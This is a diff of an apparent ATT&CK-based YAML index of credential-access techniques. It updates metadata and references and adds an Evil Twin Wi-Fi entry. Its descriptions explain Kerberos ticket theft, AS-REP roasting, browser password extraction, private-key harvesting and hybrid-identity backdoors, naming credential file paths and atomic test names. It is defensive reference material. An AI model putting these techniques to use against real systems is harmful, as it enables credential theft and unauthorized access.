-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Credential Request'
-      x_mitre_permissions_required:
-      - User
       x_mitre_system_requirements:
       - Valid domain account
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+      created: '2020-08-24T13:43:00.028Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1558/004
+        external_id: T1558.004
+      - source_name: Microsoft Detecting Kerberoasting Feb 2018
+        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+          using Azure Security Center. Retrieved March 23, 2018.
+        url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
+      - source_name: Harmj0y Roasting AS-REPs Jan 2017
+        description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved September
+          23, 2024.
+        url: https://blog.harmj0y.net/activedirectory/roasting-as-reps/
+      - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
+        description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
+          with AS-REP Roasting. Retrieved August 24, 2020.
+        url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
+      - source_name: SANS Attacking Kerberos Nov 2014
+        description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+          Guard Dog of Hades. Retrieved March 22, 2018.
+        url: https://redsiege.com/kerberoast-slides
+      - source_name: AdSecurity Cracking Kerberos Dec 2015
+        description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
+          Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
+          Domain. Retrieved March 22, 2018.
+        url: https://adsecurity.org/?p=2293
+      - source_name: Microsoft 4768 TGT 2017
+        description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
+          ticket (TGT) was requested. Retrieved August 24, 2020.'
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
+      - source_name: Microsoft Kerberos Preauth 2014
+        description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
+          It Should Not Be Disabled. Retrieved August 25, 2020.'
+        url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1558.004
     atomic_tests:
     - name: Rubeus asreproast
@@ -74708,17 +75429,12 @@ credential-access:
         name: powershell
   T1558:
     technique:
-      modified: '2024-03-01T16:58:02.395Z'
+      modified: '2024-09-17T19:49:11.455Z'
       name: Steal or Forge Kerberos Tickets
       description: |
         Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting.  Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.
 
         On Windows, the built-in <code>klist</code> utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)
-
-        Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in <code>/var/lib/sss/secrets/secrets.ldb</code> as well as the corresponding key located in <code>/var/lib/sss/secrets/.secrets.mkey</code>. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)
-
-
-        Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the <code>/etc/krb5.conf</code> configuration file and the <code>KRB5CCNAME</code> environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using <code>kinit</code>, <code>klist</code>, <code>ktutil</code>, and <code>kcc</code> built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
@@ -74754,7 +75470,7 @@ credential-access:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Logon Session: Logon Session Metadata'
@@ -74779,13 +75495,6 @@ credential-access:
         description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
           using Azure Security Center. Retrieved March 23, 2018.
         url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
-      - source_name: Kekeo
-        description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
-        url: https://github.com/gentilkiwi/kekeo
-      - source_name: SpectorOps Bifrost Kerberos macOS 2019
-        description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
-          Retrieved October 6, 2021.
-        url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
       - source_name: Medium Detecting Attempts to Steal Passwords from Memory
         description: French, D. (2018, October 2). Detecting Attempts to Steal Passwords
           from Memory. Retrieved October 11, 2019.
@@ -74794,14 +75503,6 @@ credential-access:
         description: Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket
           Attacks. Retrieved February 27, 2020.
         url: https://blog.stealthbits.com/detect-pass-the-ticket-attacks
-      - source_name: macOS kerberos framework MIT
-        description: Massachusetts Institute of Technology. (2007, October 27). Kerberos
-          for Macintosh Preferences Documentation. Retrieved October 6, 2021.
-        url: http://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html
-      - source_name: MIT ccache
-        description: 'Massachusetts Institute of Technology. (n.d.). MIT Kerberos
-          Documentation: Credential Cache. Retrieved October 4, 2021.'
-        url: https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html
       - source_name: AdSecurity Cracking Kerberos Dec 2015
         description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
           Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
@@ -74823,23 +75524,14 @@ credential-access:
         description: Sean Metcalf. (2014, September 12). Kerberos, Active Directory’s
           Secret Decoder Ring. Retrieved February 27, 2020.
         url: https://adsecurity.org/?p=227
-      - source_name: Brining MimiKatz to Unix
-        description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
-          Mimikatz et al to UNIX. Retrieved October 13, 2021.
-        url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
-      - source_name: Linux Kerberos Tickets
-        description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
-          Teams. Retrieved October 4, 2021.
-        url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1555:
     technique:
-      modified: '2024-02-26T14:19:09.417Z'
+      modified: '2024-10-15T14:57:46.850Z'
       name: Credentials from Password Stores
       description: 'Adversaries may search for common password storage locations to
         obtain user credentials.(Citation: F-Secure The Dukes) Passwords are stored
@@ -74890,7 +75582,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1555
     atomic_tests:
     - name: Extract Windows Credential Manager via VBA
@@ -75018,7 +75709,7 @@ credential-access:
         name: powershell
   T1552:
     technique:
-      modified: '2024-04-15T21:33:12.892Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Unsecured Credentials
       description: 'Adversaries may search compromised systems to find and obtain
         insecurely stored credentials. These credentials can be stored and/or misplaced
@@ -75030,6 +75721,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Austin Clark, @c2defense
       x_mitre_deprecated: false
@@ -75044,18 +75736,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Access'
       - 'Application Log: Application Log Content'
@@ -75078,9 +75770,6 @@ credential-access:
         url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552
     atomic_tests:
     - name: Search for Passwords in Powershell History
@@ -75097,32 +75786,113 @@ credential-access:
           '
         name: powershell
         elevation_required: true
+  T1557.004:
+    technique:
+      modified: '2024-11-11T18:52:53.686Z'
+      name: Evil Twin
+      description: "Adversaries may host seemingly genuine Wi-Fi access points to
+        deceive users into connecting to malicious networks as a way of supporting
+        follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+        [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+        or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+        ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+        network, fraudulent Wi-Fi access points may trick devices or users into connecting
+        to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+        evil twin)  Adversaries may provide a stronger signal strength or block access
+        to Wi-Fi access points to coerce or entice victim devices into connecting
+        to malicious networks.(Citation: specter ops evil twin)  A Wi-Fi Pineapple
+        – a network security auditing and penetration testing tool – may be deployed
+        in Evil Twin attacks for ease of use and broader range. Custom certificates
+        may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+        may also listen for client devices sending probe requests for known or previously
+        connected networks (Preferred Network Lists or PNLs). When a malicious access
+        point receives a probe request, adversaries can respond with the same SSID
+        to imitate the trusted, known network.(Citation: specter ops evil twin)  Victim
+        devices are led to believe the responding access point is from their PNL and
+        initiate a connection to the fraudulent network.\n\nUpon logging into the
+        malicious Wi-Fi access point, a user may be directed to a fake login page
+        or captive portal webpage to capture the victim’s credentials. Once a user
+        is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+        network activity, manipulate data, or steal additional credentials. Locations
+        with high concentrations of public Wi-Fi access, such as airports, coffee
+        shops, or libraries, may be targets for adversaries to set up illegitimate
+        Wi-Fi access points. "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Menachem Goldstein
+      - DeFord L. Smith
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Traffic Flow'
+      type: attack-pattern
+      id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+      created: '2024-09-17T14:27:40.947Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1557/004
+        external_id: T1557.004
+      - source_name: Kaspersky evil twin
+        description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+          them. Retrieved September 17, 2024.
+        url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+      - source_name: medium evil twin
+        description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+          Attack. Retrieved September 17, 2024.
+        url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+      - source_name: specter ops evil twin
+        description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+          Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+          17, 2024.
+        url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+      - source_name: Australia ‘Evil Twin’
+        description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+          WiFi attack on plane. Retrieved September 17, 2024.
+        url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1556.007:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Hybrid Identity
       description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
         processes that are tied to on-premises user identities in order to bypass
         typical authentication mechanisms, access credentials, and enable persistent
         access to accounts.  \n\nMany organizations maintain hybrid user and device
         identities that are shared between on-premises and cloud-based environments.
-        These can be maintained in a number of ways. For example, Azure AD includes
-        three options for synchronizing identities between Active Directory and Azure
-        AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+        These can be maintained in a number of ways. For example, Microsoft Entra
+        ID includes three options for synchronizing identities between Active Directory
+        and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
         (PHS), in which a privileged on-premises account synchronizes user password
-        hashes between Active Directory and Azure AD, allowing authentication to Azure
-        AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
-        in which Azure AD authentication attempts are forwarded to an on-premises
+        hashes between Active Directory and Entra ID, allowing authentication to Entra
+        ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+        in which Entra ID authentication attempts are forwarded to an on-premises
         PTA agent, which validates the credentials against Active Directory \n* Active
         Directory Federation Services (AD FS), in which a trust relationship is established
-        between Active Directory and Azure AD \n\nAD FS can also be used with other
+        between Active Directory and Entra ID \n\nAD FS can also be used with other
         SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
         process to AD FS and receive a token containing the hybrid users’ identity
         and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
         an adversary may be able to establish persistent privileged access to cloud
         resources. For example, adversaries who compromise an on-premises server running
         a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
-        process that authorizes all attempts to authenticate to Azure AD, as well
+        process that authorizes all attempts to authenticate to Entra ID, as well
         as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
         AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
         may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -75130,9 +75900,9 @@ credential-access:
         any set of claims, thereby bypassing multi-factor authentication and defined
         AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
         to modify the hybrid identity authentication process from the cloud. For example,
-        adversaries who compromise a Global Administrator account in an Azure AD tenant
+        adversaries who compromise a Global Administrator account in an Entra ID tenant
         may be able to register a new PTA agent via the web console, similarly allowing
-        them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+        them to harvest credentials and log into the Entra ID environment as any user.(Citation:
         Mandiant Azure AD Backdoors)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -75141,21 +75911,22 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
       - SaaS
-      - Google Workspace
-      - Office 365
       - IaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Praetorian
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -75195,55 +75966,10 @@ credential-access:
         url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1555.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Ryan Benson, Exabeam
-      - Barry Shteiman, Exabeam
-      - Sylvain Gil, Exabeam
-      - RedHuntLabs, @redhuntlabs
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
-      type: attack-pattern
-      created: '2020-02-12T18:57:36.041Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1555.003
-        url: https://attack.mitre.org/techniques/T1555/003
-      - source_name: Talos Olympic Destroyer 2018
-        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
-        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
-          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
-      - source_name: Microsoft CryptUnprotectData April 2018
-        url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
-        description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
-          June 18, 2019.
-      - source_name: Proofpoint Vega Credential Stealer May 2018
-        url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
-        description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
-          in targeted campaign . Retrieved June 18, 2019.
-      - source_name: FireEye HawkEye Malware July 2017
-        url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
-        description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
-          Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
-          2019.
-      - source_name: GitHub Mimikittenz July 2016
-        url: https://github.com/putterpanda/mimikittenz
-        description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
-          Retrieved June 20, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-15T14:13:45.294Z'
       name: 'Credentials from Password Stores: Credentials from Web Browsers'
       description: "Adversaries may acquire credentials from web browsers by reading
         files specific to the target browser.(Citation: Talos Olympic Destroyer 2018)
@@ -75273,6 +75999,12 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Ryan Benson, Exabeam
+      - Barry Shteiman, Exabeam
+      - Sylvain Gil, Exabeam
+      - RedHuntLabs, @redhuntlabs
+      x_mitre_deprecated: false
       x_mitre_detection: 'Identify web browser files that contain credentials such
         as Google Chrome’s Login Data database file: <code>AppData\Local\Google\Chrome\User
         Data\Default\Login Data</code>. Monitor file read events of web browser files
@@ -75282,18 +76014,53 @@ credential-access:
         reading web browser process memory, utilizing regular expressions, and those
         that contain numerous keywords for common web applications (Gmail, Twitter,
         Office365, etc.).'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Access'
       - 'File: File Access'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
+      created: '2020-02-12T18:57:36.041Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1555/003
+        external_id: T1555.003
+      - source_name: GitHub Mimikittenz July 2016
+        description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
+          Retrieved June 20, 2019.
+        url: https://github.com/putterpanda/mimikittenz
+      - source_name: Talos Olympic Destroyer 2018
+        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+      - source_name: Microsoft CryptUnprotectData April 2018
+        description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
+          June 18, 2019.
+        url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
+      - source_name: Proofpoint Vega Credential Stealer May 2018
+        description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
+          in targeted campaign . Retrieved June 18, 2019.
+        url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
+      - source_name: FireEye HawkEye Malware July 2017
+        description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
+          Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
+          2019.
+        url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1555.003
     atomic_tests:
     - name: Run Chrome-password Collector
@@ -75832,7 +76599,7 @@ credential-access:
           '
   T1557.003:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-09-12T19:46:04.759Z'
       name: DHCP Spoofing
       description: "Adversaries may redirect network traffic to adversary-owned systems
         by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -75869,23 +76636,23 @@ credential-access:
         phase_name: credential-access
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Alex Spivakovsky, Pentera
+      - Andrew Allen, @whitehat_zero
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
         involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
         monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
         specify that the IP allocations are low or have run out; these EIDs may indicate
         a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - Windows
       - macOS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
       x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Alex Spivakovsky, Pentera
-      - Andrew Allen, @whitehat_zero
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Application Log: Application Log Content'
@@ -75918,21 +76685,20 @@ credential-access:
       - source_name: solution_monitor_dhcp_scopes
         description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
           and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
-          March 7, 2022.'
-        url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+          September 12, 2024.'
+        url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
       - source_name: w32.tidserv.g
         description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
           14, 2022.
         url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1552.004:
     technique:
-      modified: '2023-04-12T23:52:08.194Z'
+      modified: '2024-10-04T11:31:56.622Z'
       name: 'Unsecured Credentials: Private Keys'
       description: "Adversaries may search for private key certificate files on compromised
         systems for insecurely stored credentials. Private cryptographic keys and
@@ -75943,7 +76709,7 @@ credential-access:
         as <code>~/.ssh</code> for SSH keys on * nix-based systems or <code>C:&#92;Users&#92;(username)&#92;.ssh&#92;</code>
         on Windows. Adversary tools may also search compromised systems for file extensions
         relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation:
-        Palo Alto Prince of Persia)\n\nWhen a device is registered to Azure AD, a
+        Palo Alto Prince of Persia)\n\nWhen a device is registered to Entra ID, a
         device key and a transport key are generated and used to verify the device’s
         identity.(Citation: Microsoft Primary Refresh Token) An adversary with access
         to the device may be able to export the keys in order to impersonate the device.(Citation:
@@ -75977,7 +76743,7 @@ credential-access:
       - macOS
       - Windows
       - Network
-      x_mitre_version: '1.1'
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Access'
@@ -76005,7 +76771,7 @@ credential-access:
       - source_name: Kaspersky Careto
         description: Kaspersky Labs. (2014, February 11). Unveiling “Careto” - The
           Masked APT. Retrieved July 5, 2017.
-        url: https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
+        url: https://web.archive.org/web/20141031134104/http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
       - source_name: Microsoft Primary Refresh Token
         description: Microsoft. (2022, September 9). What is a Primary Refresh Token?.
           Retrieved February 21, 2023.
@@ -76016,9 +76782,8 @@ credential-access:
         url: https://en.wikipedia.org/wiki/Public-key_cryptography
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.004
     atomic_tests:
     - name: Private Keys
@@ -76240,7 +77005,7 @@ credential-access:
         elevation_required: true
   T1557.001:
     technique:
-      modified: '2023-04-25T14:00:00.188Z'
+      modified: '2022-10-25T15:46:55.393Z'
       name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
       description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
         spoof an authoritative source for name resolution to force communication with
@@ -76348,7 +77113,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1557.001
     atomic_tests:
     - name: LLMNR Poisoning with Inveigh (PowerShell)
@@ -76367,7 +77131,7 @@ credential-access:
         elevation_required: true
   T1003.001:
     technique:
-      modified: '2023-12-27T17:57:20.003Z'
+      modified: '2024-08-13T13:52:45.379Z'
       name: 'OS Credential Dumping: LSASS Memory'
       description: |
